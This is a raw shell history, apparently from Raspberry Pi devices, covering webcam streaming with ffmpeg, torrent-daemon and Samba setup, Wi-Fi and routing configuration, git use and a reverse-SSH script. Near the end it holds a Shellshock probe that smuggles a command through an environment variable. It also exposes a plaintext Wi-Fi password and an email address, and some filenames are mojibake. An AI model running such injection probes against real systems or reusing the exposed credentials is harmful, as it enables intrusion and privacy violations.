ws://thegigabots.app.bigbang.io:80 +wscat -l ws://thegigabots.app.bigbang.io +sudo wscat -l ws://thegigabots.app.bigbang.io +wscat -l ws://echo.websocket.org +sudo node /home/pi/dist/node/stream-server.js johnpi +reboot +sudo reboot +free -h -s 1 +free -h +top +git commit -a +sudo git commit -a +push to master +sudo git push to master +ls +sudo git push origin master +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24 +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24 +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24 +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24 +ffmpeg -s 320x240 -f video4linux2 -i /dev/video1 -f mpeg1video -r 24 +ffmpeg -s 320x240 -f video4linux2 -i /dev/video2 -f mpeg1video -r 24 +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24 +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24 +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24 +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24 +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24 +sudo node /home/pi/dist/node/stream-server.js johnpi +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24s-west-2.compute.amazonaws.com/johnpi/640/480/ +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24 +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24s-west-2.compute.amazonaws.com:22/johnpi/640/480/ +sudo ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24s-west-2.compute.amazonaws.com:22/johnpi/640/480/ +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24s-west-2.compute.amazonaws.com:22/johnpi/640/480/ +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24s-west-2.compute.amazonaws.com/johnpi/640/480/ +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24s-west-2.compute.amazonaws.com:8082/johnpi/640/480/ +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24 +sudo node /home/pi/dist/node/stream-server.js johnpi +sudo reboot +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24s-west-2.compute.amazonaws.com:8082/johnpi/640/480/ +sudo reboot +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24s-west-2.compute.amazonaws.com:8082/johnpi/640/480/ +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24s-west-2.compute.amazonaws.com:8082/johnpi/640/480/ +sudo reboot +raspistill -v -o test.jpg +raspivid -t 2000 -o video.h264 +ls +top +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24s-west-2.compute.amazonaws.com:8082/johnpi/320/240/ +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24s-west-2.compute.amazonaws.com:8082/johnpi/320/240/ +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24s-west-2.compute.amazonaws.com:8082/johnpi/320/240/ +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24s-west-2.compute.amazonaws.com:8082/johnpi/558/350/ +ffmpeg -s 558x350 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24s-west-2.compute.amazonaws.com:8082/johnpi/558/350/ +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24s-west-2.compute.amazonaws.com:8082/johnpi/320/240/ +ffmpeg -s 640x480 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24s-west-2.compute.amazonaws.com:8082/johnpi/640/480/ +ffmpeg -s 540x405 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24s-west-2.compute.amazonaws.com:8082/johnpi/540/405/ +ffmpeg -s 480x360 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24s-west-2.compute.amazonaws.com:8082/johnpi/480/360/ +ffmpeg -s 280x210 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24s-west-2.compute.amazonaws.com:8082/johnpi/280/210/ +ffmpeg -s 256x192 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24s-west-2.compute.amazonaws.com:8082/johnpi/256/192/ +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 30s-west-2.compute.amazonaws.com:8082/johnpi/320/240/ +raspivid -t 0 -w 320 -h 240 -fps 20 -vf -o - | ffmpeg -y -i pipe:0 -s 320x240 -f video4linux2 -f mpeg1video -b 400k -r 30s-west-2.compute.amazonaws.com:8082/johnpi/320/240/ +uv4l --help --driver raspicam --driver-help +ls +rm -r crosstool-ng-master/ +rm test.jpg +rm video.h264 +ls +raspivid -t 9999999 -w 960 -h 540 -fps 25 -hf -o - | ffmpeg -i - -vcodec copy -an -r 25 -f flv -metadata streamName=raspicamtcp://ec2-54-68-32-16.us-west-2.compute.amazonaws.com:8082 +raspivid -t 9999999 -w 960 -h 540 -fps 25 -hf -o - | ffmpeg -i - -vcodec copy -an -r 25s-west-2.compute.amazonaws.com:8082/johnpi/960/540/ +raspivid -t 9999999 -w 960 -h 540 -fps 25 -hf -o - | ffmpeg -i - -vcodec copy -an -f mpeg1video -r 24s-west-2.compute.amazonaws.com:8082/johnpi/960/540/ +raspivid -t 9999999 -w 960 -h 540 -fps 25 -hf -o - | ffmpeg -i - -vcodec copy -an -r 24 -f mpeg1videos-west-2.compute.amazonaws.com:8082/johnpi/960/540/ +ffmpeg -s 360x270 -f video4linux2 -i /dev/video0 -f mpeg1video -r 30s-west-2.compute.amazonaws.com:8082/johnpi/360/270/ +ffmpeg -s 400x300 -f video4linux2 -i /dev/video0 -f mpeg1video -r 30s-west-2.compute.amazonaws.com:8082/johnpi/400/300/ +ffmpeg -s 384x288 -f video4linux2 -i /dev/video0 -f mpeg1video -r 30s-west-2.compute.amazonaws.com:8082/johnpi/384/288/ +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 30s-west-2.compute.amazonaws.com:8082/johnpi/320/240/ +ffmpeg -s 400x300 -f video4linux2 -i /dev/video0 -f mpeg1video -r 30s-west-2.compute.amazonaws.com:8082/johnpi/400/300/ +top +top +exit +screen -ls +screen -r 11512.pts-0.raspberrypi +screen -r 11458.pts-0.raspberrypi +screen -ls +exit +screen +screen -ls +exit +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24s-west-2.compute.amazonaws.com:8082/johnpi/320/240/ +exit +screen +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24s-west-2.compute.amazonaws.com:8082/johnpi/320/240/ +exit +ls +dh -f +df -h +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24s-west-2.compute.amazonaws.com:8082/johnpi/320/240/ +exit +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24s-west-2.compute.amazonaws.com:8082/johnpi/320/240/ +exit +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24s-west-2.compute.amazonaws.com:8082/johnpi/320/240/ +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24s-west-2.compute.amazonaws.com:8082/johnpi/320/240/ +sudo reboot +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24s-west-2.compute.amazonaws.com:8082/johnpi/320/240/ +exit +sudo git commit -a +sudo git push origin +exit +usdo shutdown now +sudo shutdown now +node dist/node/BigBangShell.js +node dist/node/BigBangShell.js thegigabots.app.bigbang.io +top +node dist/node/BigBangShell.js thegigabots.app.bigbang.io +top +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24s-west-2.compute.amazonaws.com:8082/johnpi/320/240/ +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 60s-west-2.compute.amazonaws.com:8082/johnpi/320/240/ +exit +node dist/node/BigBangShell.js thegigabots.app.bigbang.io +exit +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24s-west-2.compute.amazonaws.com:8082/johnpi/320/240/ +sudo wicd-curses +ssh JSDiBaggio@ +fconfig +ffconfig +fconfig +fconf +ffconf +hconfig +ls +ifconfig +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 60s-west-2.compute.amazonaws.com:8082/johnpi/320/240/ +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 30s-west-2.compute.amazonaws.com:8082/johnpi/320/240/ +ls +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 30s-west-2.compute.amazonaws.com:8082/johnpi/320/240/ +sudo shutdown now +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 30s-west-2.compute.amazonaws.com:8082/johnpi/320/240/ +exit +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 30s-west-2.compute.amazonaws.com:8082/johnpi/320/240/ +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 30s-west-2.compute.amazonaws.com:8082/johnpi/320/240/ +sudo shutdown now +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 30s-west-2.compute.amazonaws.com:8082/johnpi/320/240/ +sudo reboot +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 30s-west-2.compute.amazonaws.com:8082/johnpi/320/240/ +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 30s-west-2.compute.amazonaws.com:8082/johnpi/320/240/ +node BigBangShell.js thegigabots.app.bigbang.io +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 30s-west-2.compute.amazonaws.com:8082/johnpi/320/240/ +exit +wgets/source/t/tornado/tornado-4.0.2.tar.gz +ls +tar -zxvf tornado-4.0.2.tar.gz +ls +rm tornado-4.0.2.tar.gz +ls +pip +pip install tornado +python setup.py build +sudo python setup.py install +pip +python +sudo apt-get install python-dev +sudo apt-get install libjpeg-dev && sudo apt-get install libfreetype6-dev && sudo apt-get install python-setuptools && sudo apt-get install python-pip +pip install tornado +pip upgrade tornado +pip --upgrade tornado +sudo apt-get upgrade tornado +ls +nano ledcontrol.py +sudo python ledcontrol.py +tornado +pip install backports.ssl_match_hostname +sudo python ledcontrol.py +pip install backports.ssl_wrap_socket +nano ledcontrol.py +sudo python ledcontrol.py +pip uninstall tornado +pip install tornado +tornado +sudo python ledcontrol.py +tornado.util +tornado.options +ls +ls +sudo python ledcontrol.py +nano ledcontrol.py +sudo python ledcontrol.py +pip install backports.ssl_match_hostname +sudo python ledcontrol.py +nano ledcontrol.py +nano helloworld.py +sudo python helloworld.py +mv helloworld.py tornado-4.0.2/helloworld.py +sudo python helloworld.py +exit +sudo git commit -a +sudo git push origin master +sudo git commit -a +ls +sudo git add . +sudo git commit -a +sudo git push origin master +nano README.md +sudo git add . +sudo git commit -a +sudo git push origin master +ecit +version +ls +ls +version +tornado version +VERSION +ld +ls +sudo python helloworld.py +pip install backports.ssl_match_hostname +sudo python helloworld.py +pip uninstall tornado +easy_install tornado +sudo easy_install tornado +ls +sudo python helloworld.py +easy_install backports.ssl_match_hostname +sudo easy_install backports.ssl_match_hostname +sudo python helloworld.py +sudo python ledcontrol.py +nano ledcontrol.py +sudo python ledcontrol.py +nano ledcontrol.py +mv ledcontrol.py tornado-4.0.2/ledcontrol.py +sudo python ledcontrol.py +mv ledcontrol.py ../ledcontrol.py +ld +ls +nano ledcontrol.py +sudo python ledcontrol.py +nano ledcontrol.py +sudo python ledcontrol.py +nano ledcontrol.py +sudo python ledcontrol.py +nano ledcontrol.py +sudo python ledcontrol.py +nano ledcontrol.py +sudo python ledcontrol.py +nano ledcontrol.py +sudo python ledcontrol.py +nano ledcontrol.py +sudo python ledcontrol.py +nano ledcontrol.py +ls +ls +npm isntall pi-gpio +sudo npm install pi-gpio +ls +ls +ls +sudo npm install pi-gpio +exit + +scp stream.js JSDiBaggio@ +scp stream.js John-DiBaggios-MacBook@ +ls +node stream.js +node app.js +sudo node app.js +git clone git://github.com/quick2wire/quick2wire-gpio-admin.git +make +sudo make install +sudo adduser $pi gpio +exit +./secure +ls +exit +ls +vi index.php +vi user.php +exit +sudo locale-gen en_US +sudo apt-get install +git init +sudo apt-get install git +git init +nano README.md +git status +git add README.md +git commit +git status +git commit -m "Initial commit" +git config --global user.name "Avsanka" +git commit --amend --reset-author +nano index.html +git add index.html +git commit -m "added index.html" +git log +git checkout -b new-feature +cat index.html +git checkout master +cat index.html +git merge new-feature +ls -la ~/.ssh/ +ssh-keygen -t rsa -b 4096 -c "nikita555534@gmail.com" +eval "$(ssh-agent -s)" +ssh-add ~/.ssh/id_rsa +ssh-keygen -t rsa -b 4096 -C "nikita555534@gmail.com" +eval "$(ssh-agent -s)" +ssh-add ~/.ssh/id_rsa +cat ~/.ssh/id_rsa +cat ~/.ssh/id_rsa.pub +git remote add origin *ssh* +git remote add origin git@github.com:Avsanka/calculator.git +git remote set-url origin git@github.com:Avsanka/calculator.git +git push -u origin master +exit +vagrant halt +sudo apt-get install ntfs-3g +sudo apt-get install samba +umount /dev/sda1 +sudo umount /dev/sda1 +umount --help +man umount +umount -f -v /dev/sda1 +sudo umount -f -v /dev/sda1 +ls +ls -al +ls +umount /home/pi/storage +sudo umount /home/pi/storage +ls +ls +nano readme.txt +ls +cat readme.txt +ls +sudo mount -t auto /dev/sda1 /home/pi/storage +ls +ls +ls +ls rea* +sudo umount /home/pi/storage +sudo umount /home/pi/storage +ls +ls +sudo apt-get install samba samba-common-bin +ls +ls sam* +sudo vim smb.conf +sudo vim /etc/smb.conf +ls +ls sam* +cat smb.conf +ls smb.conf +ls smb.conf -al +ls +vim smb.conf +ps -ef|grep samba +vim smb.conf +ls +cp smb.conf smb.conf.old +sudo cp smb.conf smb.conf.old +ls +vim smb.conf +ls +chmod +w smb.conf +sudo chmod +w smb.conf +vim smb.conf +ls +ls smb.conf -al +sudo su - +ls -al +pwd +netstat -an +ps -ef |grep deluge +netstat -a +ls +ls -al +pwd +ls +fdisk -l +sudo fdisk -l +mount -t auto /dev/sda1 /home/pi/storage +sudo mount -t auto /dev/sda1 /home/pi/storage +ls +rm -f * +sudo rm -f * +sudo rm -fr * +ls +df +ls +ls -al +ls +ls -al +ls +ls -al +echo xxx> 1.txt +ls +ls -al +chmod 775 . +sudo chmod 775 /home/pi/storage +ls +echo xxx x>1.txt +vi 1.txt +ls +ls -al +echo xxx>1.txt +ls +ls storage +ls +ls -al storage +ls +ls -al +df +sudo chmod 775 /home/pi/storage +ls +ls -al +chmod 775 /home/pi/storage +sudo chmod 775 /home/pi/storage +ls -al +sudo chmod 777 /home/pi/storage +ls +ls -al +chown pi /home/pi/storage +sudo chown pi /home/pi/storage +mkdir 1 +umount /home/pi/storage +umount /dev/sda1 +sudo umount /home/pi/storage +mount -t auto /dev/sda1 /home/pi/storage +sudo mount -t auto /dev/sda1 /home/pi/storage +fdisk -l +sudo fdisk -l +sudo mount -t auto /dev/sdb1 /home/pi/storage +ls +ls -al +sudo chmod 775 /home/pi/storage +ls -al +echo zzz>1.txt +sudo echo zzz>1.txt +cat \?\?\?\?\?\?.txt +sudo chown pi /home/pi/storage +ls +ls +ls -al +sudo chown pi . +df +ls +chmod +chown +chown +mount +fdisk -l +sudo fdisk -l +fdisk -l +sudo su - +ls +ls +ls -al +ls +ls +ls -al +ipconfig +ifconfig +ls -al +ls -al +cat readme.txt +mount +ls +sudo fdiks -l +sudo fdisk -l +sudo mount -o umask=0 -t auto /dev/sda1 /home/pi/storage +sudo fdisk -l +sudo mount -o umask=0 -t auto /dev/sda1 /home/pi/storage +ls +ls -al +echo 123>��.txt +ls -al +echo sudo mount -o umask=0 -t auto /dev/sda1 /home/pi/storage>mount-sd.sh +ls +mv mount-sd.sh ../mount-sd.sh +ls +cat mount-sd.sh +vim mount-sd.sh +chmod +x mount-sd.sh +./mount-sd.sh +ls mount-sd.sh +ls mount-sd.sh -al +netat -an +netstat -an +netstat -an|grep tcp +sudo deluge restart +/etc/deluged restart +/etc/init.d/deluged restart +ls -al +ps -ef|grep deluge +pkill deluged +ps -ef|grep deluge +/usr/bin/python /usr/bin/deludged -d +ls +deluged -d +deluged -d& +netstat -an|grep tcp +pkill deluged +deluged -d & +ifconfig +pkill deluged +deluged -d & +netstat -an|grep tcp +sudo apt-get search utorrent +apt-get +apt-search +deluge --help +deluge-console +apt-get install utorrent +sudo apt-get install utorrent +ls +ls +passwd +pi +passwd +deluge-console +ls +ls +ls +ls del* +ls +ls +ls +ls +vim core.conf +nano auth +vim deluged.log +ls *.log +ls -al *.log +vim web.conf +ls -al +pwd +deluge-console +netat -an +netstat -an +netstat -an|grep tcp +deluge-console +ps -ef|grep deluge +sudo pkill deluge-web +nano ~/.config/deluge/web.conf +sudo deluge-web& +netstat -an|tpc +netstat -an|tcp +netstat -an|grep tcp +nano ~/.config/deluge/web.conf +sudo pkill deluge-web +nano ~/.config/deluge/web.conf +sudo pkill deluge-web +sudo deluge-web& +netstat -an|grep tcp +pkill deluge-web +sudo pkill deluge-web +sudo deluge-web +ps -ef|grep deluge +sudo deluge-web& +ps -ef|grep deluge +netstat -an|grep tcp +nano ~/.config/deluge/web.conf +ls +diff web.conf~ web.conf +sudo pkill deluge-web +ls +ps -ef|grep deluge +netstat -an|grep tcp +sudo deluge-web& +netstat -an|grep tcp +deluge-web restart +deluge-web& +netstat -an|grep tcp +sudo vim /etc/init.d/deluge-daemon +ls +diff web.conf~ web.conf +:q +ls +pkill deluge-web +sudo pkill deluge-web +cp web.conf~ web.conf +ls +diff web.conf~ web.conf +vim web.conf +ls web* +ls web* -al +vim web.conf~ +vim web.conf +sudo deluge-web& +netstat -an|grep tcp +cat web.conf +netstat -an|grep tcp +reboot +sudo reboot +ls +sudo ./mount-sd.sh +ls +ls -al +ls +ls +ls +ls +cat deluged.log +vim core.conf +cp core.conf core.conf~ +vim core.conf +diff core.conf core.conf~ +vim core.conf +diff core.conf core.conf~ +netstat -an|grep tcp +reboot +sudo reboot +sudo fdisk -l +mount +./mount-sd.sh +ls +mount +sudo reboot +ls +./mount-sd.sh +ps -ef|deluge +ps -ef|grep deluge +sudo pkill deluged +deluged -d +deluged -d& +ls +ls +exit +ls +top +ls +ls +ls de* +ls del* +ls -al del* +sudo vim deluge-daemon +cat deluge-daemon +sudo reboot +sudo vim deluge-daemon +sudo su - +ls +ls +di +dir +idr +dir +sudo ./buz_pwm +ls -al +df +ls +ls -al +pwd +df -al +ls -al +ls +ls -al +rm 撣�霈堆��券餈賜�.2014.銝剛摮�嚙。MCT甇颱滿撉ㄚ/ +ls +ls -al +rf -fr 撣�霈堆��券餈賜�.2014.銝剛摮�嚙。MCT甇颱滿撉ㄚ/ +rm -fr 撣�霈堆��券餈賜�.2014.銝剛摮�嚙。MCT甇颱滿撉ㄚ/ +ls +df -al +ls -al +df -al +reboot +sudo reboot +ls -al +cat 銝剖.txt +sudo rasp-config +sudo raspi-config +ls -al +lsusb +sudo lsusb +sudo apt-cache search ralink +sudo apt-get install firmware-ralink +iwlist +iwlist ap +man iwlist +iwlists scanning +iwlist scanning +ifconfig +iwlist wlan- scanning +iwlist wlan0 scanning +iwlist +iwlist scanning +iwlist wlan0 scanning +lsusb +ifconfig +dmesg +df +dmesg |grep ^usb +dmesg |grep usb +iwlist wlan0 scannning +iwlist wlan0 scanning +iwconfig +sudo nao /etc/networks/interfaces +sudo nano /etc/networks/interfaces +sudo nano /etc/network/interfaces +cat /etc/network/interfaces +wpasuppicant +wpasupplicant +vim /etc/wpa_supplicant/wpa_supplicant.conf +sudo vim /etc/wpa_supplicant/wpa_supplicant.conf +wpa_supplicant +iwlist +sudo ifup wlan0 +iwlist wlan0 scanning +sudo nano /etc/wpa.conf +sudo ifup wlan0 +ifconfig +iwlist wlan0 +iwlist wlan0 scanning +reboot +sudo reboot +ifconfig +iwlist wlan0 sanning +iwlist wlan0 scanning +ip +ip wlan0 list +ip wlan0 list inet +ifconfig +icofnig +ifconfig +iwlist +ifconfig wlan-0 scanning room602 +ifconfig wlan0 scanning room602 +sudo iwlist wlan0 scanning room602 +sudo iwlist wlan0 scanning +vim /etc/network/inetfaces +sudo /etc/network/inetfaces +sudo nano /etc/network/interfaces +cat /etc/network/interfaces +ls +ifconfig +man iwlist +sudo iwlist wlan0 auth +man iwlist +sudo iwlist wlan0 ap +sudo iwlist wlan0 scan +cat /etc/wpa.conf +sudo ifup wlan0 +iwlist wlan0 +iwlist wlan0 list +cat /etc/network/interfaces +cat /etc/wpa_supplicant/wpa_supplicant.conf +sudo cat /etc/wpa_supplicant/wpa_supplicant.conf +sudo /etc/network/interfaces +sudo nano /etc/network/interfaces +sudo ifdown wlan0 +sudo ifup wlan0 +ifconfig +wpasupplicant +wpa-supplicant +wpa_supplicant +iwlist wlan0 scan +sudo iwlist wlan0 scan +sudo iwconfig +iwconfig wlan0 ap room602 +iwconfig wlan0 ap any +sudo iwconfig wlan0 ap any +sudo iwconfig +sudo iwconfig wlan0 ap ROOM602 +sudo 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-I wlan0 +route add +ls -al +cat 銝剖.txt +is +ls +iwconfig +iwconfig --help +iwconfig wan0 essid "room602" enc s"liu567890" +sudo iwconfig wan0 essid "room602" enc s"liu567890" +sudo iwconfig wan0 essid ap "room602" enc s"liu567890" +iwconfig +sudo iwconfig wlan0 essid "room602" enc s"liu567890" +sudo iwconfig wlan0 essid "room602" key s"liu567890" +ls +ls -al +who +ls +cat readme.txt +wpa_cli +man wpa_cli +locate wpa_supplicant +/system/bin/ +wpa_supplicant -d -Dwext iwlan0 -c/etc/wap.conf +wpa_supplicant -Dwext iwlan0 -c/etc/wap.conf +wpa_supplicant -d -Dwext -iwlan0 -c/etc/wap.conf +wpa_supplicant -d -Dwext -iwlan0 -c/etc/wpa.conf +sudo wpa_supplicant -d -Dwext -iwlan0 -c/etc/wpa.conf +sudo vim /etc/wap.conf +sudo vim /etc/wpa.conf +sudo wpa_supplicant -d -Dwext -iwlan0 -c/etc/wpa.conf +sudo vim /etc/wpa.conf +sudo wpa_supplicant -d -Dwext -iwlan0 -c/etc/wpa.conf +dhclient wlan0 +sudo dhclient wlan0 +sduo dhclient -d wlan0 +sudo dhclient -d wlan0 +man dhclient +find / -name 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+ifconfig +route +if config +cat policy-routes +chmod +x policy-routes +ls -al policy-routes +sudo vim /etc/iproute2/rt_tables +sudo ./policy-routes +ls +ip rule show +ping -I eth0 163.com +reboot +supo reboot +sudo reboot +ifconfig +vim policy-routes +sudo ./policy-routes +ls -al +who is here? +ping -I wlan0 163.com +ping -I eth0 163.com +ping -I wlan0 +ip rule show +cat policy-routes +vim /etc/iproute2/rt_tables +ping +vim policy-routes +sudo ./policy-routes +ping -I 163.com +ping -I wlan0 163.com +ip rule show +cat /etc/iproute2/rt_tables +ip tables show +ip table show +ifocnfig +ifconfig +ping +ping +ping -I wlan0 +reboot +sudo reboot +ifonfig +ifconfig +sudo ./policy-routes +ls +ifconfig +who +top +ls -al +top +ping -I wlan0 +ifconfig +ping -I +ls +suod ./policy-routes +sudo ./policy-routes +lsusb +ls +ifcofing +ifconfig +sudo ifup wlan0 +reboot +sudo init 6 +ls +lsusb +ls /dev/hd* +ls /dev/sd +ls /dev/sd* +ls +sudo makedir /media/mobilehd +sudo mkdir /media/mobilehd +mount +sudo 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mount-mobilehd.sh +./mount-mobilehd.sh +ls /media/mobilehd/ +df +ls -al +sudo fdisk -l +ls +top +ls +ls de* +ls -al +ls +ls +ls -al +ls +vim sudoers +cat sudoers +sudo cat sudoers +ls +ls +ls +ls +nano deluge-daemon +ls +vim deluge-daemon +sudo vim deluge-daemon +ls +cat deluge-daemon +ls +ls +ls del* +sudo vim deluge-daemon +ls +ls +cat deluge-daemon +ls +ls +ls -a .delu* +ls -al +ls +ls +vim web.conf +sudo deluged retart +sudo deluge-web restart +sudo deluge-webd restart +sudo deluge-web start +deluge-web& +top +netstat -an|400 +netstat -an|4001 +netstat -an +netstat -an|grep tcp +ls +ls +vim core.conf +ls +top +ls /home/pi/storage +ls -al +top +ls +top +ifconfig +ls /media/mobilehd +ls +ls +who +ls -al +top +ls +cat moun-mobilehd.sh +vim mount-mobilehd.sh +[-z mount-mobilehd.sh] +if [-z mount-mobilehd.sh]; echo sss; fi +ls +./mount-mobilehd.sh +ls +cat view-cpu-mem-usage.sh +if [ -z /media/mobilehd ]; then echo world; fi +if [ -z /media/mobilehdx ]; then echo world; fi +if [ -z -type f /media/mobilehdx ]; then echo world; fi +if [ -z /media/mobilehdx ]; then echo world; fi +if [ -f /media/mobilehd ]; then echo world; fi +if [ -f /media/mobilehdx ]; then echo world; fi +if [ -f "/media/mobilehdx" ]; then echo world; fi +if [ -f "/media/mobilehd" ]; then echo world; fi +mypath=media/mobilehd +echo $mypath +mypath=/media/mobilehd +ls $mypath +if [ -f "$mypath"]; then echo exist fi; +if [ -f "$mypath"]; then echo exist; fi +if [-f "$mypath"]; then echo exist; fi +if [ -f "$mypath" ]; then echo exist; fi +if [ ! -f "$mypath" ]; then echo exist; fi +echo $mypath +ls $mypath +if [ ! -f "$mypath" ]; then echo exist; fi +if [ -d "$mypath" ]; then echo exist; fi +if [ -x "$mypath" ]; then echo exist; fi +ls +vim mount-mobilehd.sh +./ mount-mobilehd.sh +./mount-mobilehd.sh +vim mount-mobilehd.sh +./mount-mobilehd.sh +vim mount-mobilehd.sh +./mount-mobilehd.sh +ls /dev/sda1 +vim ./mount-mobilehd +vim ./mount-mobilehd.sh +./mount-mobilehd.sh +vim mount-mobilehd.sh +ls -al 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-ef|grep ssh +logout +do while(true): +while(true): +ping +exit +ls -al +cool! +man ssh +ls -al +exit +ls +ps -ef|grep ssh +ls +ps -ef|grep ssh +kill 2604 +ps -ef|grep ssh +kill -9 2604 +ps -ef|grep ssh +ls +./reverse-ssh +ls +ls -al +cat known_hosts +ls al +ls -al +ls /media/ +ls +ls +ls +ls -al +./mount-mobilehd.sh +ls +ls /dev +sudo fdisk -l +sudo reboot +ls +./reverse-ssh +which looks cool +wget www.whatsmyip.org +vim index.html +lynx +wget whatsmyip.org +netstat -an|grep tcp +netstat -an|grep 211.160 +du +du / +who +netstat -an | grep tcp +top +deluge +man deluge +deluged +top +deluge-client +top +ls +ls -al +who is here +top +who +looks very stable +df +sudo fdisk -l +ls /dev/mmcblk0p1 +dir +mount /dev/mmcblk0p1 /media/mmcblk0p1 +sudo mount /dev/mmcblk0p1 /media/mmcblk0p1 +mkdir /media/mmcblk0p1 +sudo mkdir /media/mmcblk0p1 +sudo mount /dev/mmcblk0p1 /media/mmcblk0p1 +ls +ls +unmount /media/mmcblk0p1 +man mount +umount +umount /media/mmcblk0p1 +sudo umount /media/mmcblk0p1 +ls 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+vim .profile +sudo shutdown +sudo shutdown 1 +ls +ls -al +pwd +speed +is it quick or not? +ls -al +top +ls -al +vim +ls +pwd +ls +ls +cat python-learn +ls +ls -al +view-cpu-mem-usage.sh +./view-cpu-mem-usage +./view-cpu-mem-usage.sh +great idea +thanks +who are you +tablet +Hague protocol +Hague +ls +rebboot +sudo reboot +ls -al +ls +ls +who +df +ls -al +ping td-w8984ln +ping +ping +ping +df +dir +dir /w +dir +ls +dir +rm BBC.Great.Barrier.Reef.2012.720p.BluRay.x264.DTS-WiKi/ -r -f +ls +df +rm -r -f Total\ Recall\ 2012\ 720p\ BluRay\ X264_10bit\ AC3-HD001/ +df +ls +rm -r -f Spar* +ls -al +rm -r f ��霈�.2010.銝剛摮����嚙。MCT�交�/ +rm -r -f ��霈�.2010.銝剛摮�嚙。MCT�交�/ +dir� +df +exit +ls -al +top +sudo iftop +ls -al +sdafsadf +top +c d +ls .ssh +ls -al .ssh +ls -al +cat known_hosts +cat known_hosts +tunnel +cat known_hosts +ping broadcom.home +top +sudo iftop +top +iftop +sudo iftop +top +sudo iftop +ls +sudo iftop +ping TD-W89841N +pwd +ls +ls -al +ls +ls -al +ls +ls -al +mkdir git +sudo mkdir git +mv project.git/ ./git +sudo mv project.git/ ./git +chown git ./git -R +sudo chown git ./git -R +ls +ls +ls -al +ls -al +cat project.git +ls HEAD +cat HEAD +ls -al +dir +ls -al +ls .git +mkdir dial.git +pwd +exit +su git +ls -al +mkdir gitprojects +sudo mkdir gitprojects +ls +ls +ls -al +rmdir +rmdir gitprojects +sudo rmdir gitprojects +ls -al +sudio mkdir project.git +sudo mkdir project.git +git --bare init +ls +ls -al +su git +sudo /etc/passwd +sudo vim /etc/passwd +su git +ls +chown project.git git +chown git project.git +sudo chown git project.git +ls +ls -al +su git +exit +sudo /etc/passwd +sudo vim /etc/passwd +su git +pw +top +pwd +ls +ls +ls +su pi +logout +exit +ls -l +ls +ls +exit +ls -al +pwd +sudo adduser git +su git +su git +su git +exit +ignore +man evv +man env +/bin/true +env var='f(){fuck;}; echo vulnerable' bash -c /bin/true +set xxx =1 +ehco xxx +echo xxx +echo $xxx +set xxx=1 +echo xxx +echo $xxx +set $xxx +echo $xxx +set xxx=1 +echo path +echo $PATH +echo $xxx +set xxx +echo $xxx +set xxx=1 +echo $xxx +env +man env +declare XXX='nothing' +echo $XXX +env|grep XXX +set -a XXX +env|grep XXX +echo $XXX +$XXX=1 +XXX=1 +echo $XXX +sfsadf=1 